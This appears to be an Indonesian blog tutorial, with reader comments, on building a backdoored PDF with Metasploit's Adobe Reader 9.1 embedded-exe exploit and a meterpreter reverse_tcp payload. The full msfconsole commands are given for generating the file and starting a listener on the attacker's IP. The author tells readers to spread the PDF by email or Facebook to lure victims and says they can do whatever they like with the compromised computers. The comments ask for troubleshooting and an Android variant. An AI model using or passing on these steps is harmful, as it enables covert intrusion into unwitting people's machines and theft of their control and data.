Haii bro, kali ini saya akan memberikan tutorial mengenai Cara Exploit Windows Menggunakan PDF dengan Metasploit, Apa itu Metasploit? Metasploit merupakan sebuah tools penetration testing yang sangat berbahaya, dengan metasploit kita bisa masuk bahkan dapat menguasai sistem orang lain, namun agar bisa masuk ke sistem orang lain menggunakan metasploit tidak mudah, untuk itu kita harus memebuat backdoor yang digunakan untuk jalan masuk ke sistem korban.
nah untuk menyamarkan backdor tersebut pada tutorial ini saya membuat backdoor dengan format file .pdf
oke langsung saja simak langkah-langkahnya :
Tested : Windows 7 Ultimate 32bit
Vulnerable Application Testing : Adobe Reader 9.1
pertama jalankan terlebih dahulu service postgresql dan metasploit
service postgresql start
service metasploit start
Selanjutnya buka metasploit, dengan perintah
msfconsole
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
set payload windows/meterpreter/reverse_tcp
set filename Ebook_Hacking.pdf
set lhost 192.168.1.106
set lport 443
exploit
Keterangan:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs --> Type exploit yang digunakan
set payload windows/meterpreter/reverse_tcp --> Mengatur payload yang di gunakan ke sebuah target ketika shell sudah terpasang
set filename Ebook_Hacking.pdf --> Nama file backdor, buat semenarik mungkin agar korban penasaran untuk membukanya
set lhost 192.168.1.106 --> Ip Attacker, isi sesuai dengan IP anda
set lport 443 --> Port Listener, saya menggunakan port 443 karena selalu terbuka
exploit --> Perintah untuk menghasilkan file PDF (backdoor)
Setelah berhasil menghasilkan PDF, file PDF akan tersimpan di folder /root/.msf4/local/(nama pdf). folder .msf4 ini biasanya tersembunyi, untuk memunculkan .msf4 kalian tinggal tekan keyborad CTRL+H
tahap diatas adalah pembuatan backdoor, selanjutnya kita jalankan exploit, ketikkan perintah berikut pada terminal
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 443
set lhost 192.168.1.106 (sesuaikan ip kalian)
exploit
Sekarang kalian sebarkan file pdf(backdoor) yang dibuat tadi melaui email, faceebook, dll terserah bagaimana caranya agar korban membuka file pdf(backdoor) tersebut
meterpreter sessions opened :D, itu tandanya kita sudah masuk ke sistem korban, apabila sudah sampai tahap ini terserah kalian mau diapain komputer korban :D, untuk perintah-perintah meterpreter yang lain kalian bisa cari sendiri di google.
sekian dulu tutorial kali ini mengenai Exploit Windows Menggunakan PDF dengan Metasploit semoga bermanfaat, tutorial ini saya buat hanya untuk pembelajaran saja, apabila ada penyalahgunaan dari tutorial ini itu diluar tanggung jawab saya, gunakan ilmu dengan bijak.
Gila gila
BalasHapussaya masih waras om :>)
Hapusgan
BalasHapuskalo file pdf nya diedit
exploit nya hilang ga ?
Permisi min mau nanya nih
BalasHapusSetelah ane eksekusi exploit kok gk muncul stage nya dan meterpreter pun gk kebuka :(
Ada saran/solusi gk gan ??
MOHON PENCERAHANNYA GAN ^_^
Target menggunakan Adobe Reader versi brp mas?
BalasHapusbisa di baca lagi di atas, exploit ini vuln di Adobe reader v.9.1
misi gan, ane coba malah backdor ketika didownload keterang di msf nya malah "OpenSSL : : SSL : : SSLError SSL_Accept SYSCall returned=5 errno=0 state=SSLv2/v3 read client hello A"
BalasHapusdan file backdor nya ngga bisa kedownload gan.. ane testing di windows 10..
mohon pencerahannya gan..
bukannya yg no_js cuma work di win xp ya vroh ?
BalasHapuswin7 work om, ane nyoba yg 32bit
HapusPermisi gan..
BalasHapusIni untuk file pdf yang di buka di windows kan?
Kalau di android gimana ya? Jadi file pdfnya di injek listener. Kemudian di buka di anroid dan langsung listener buka sesi.
Terimakasih gan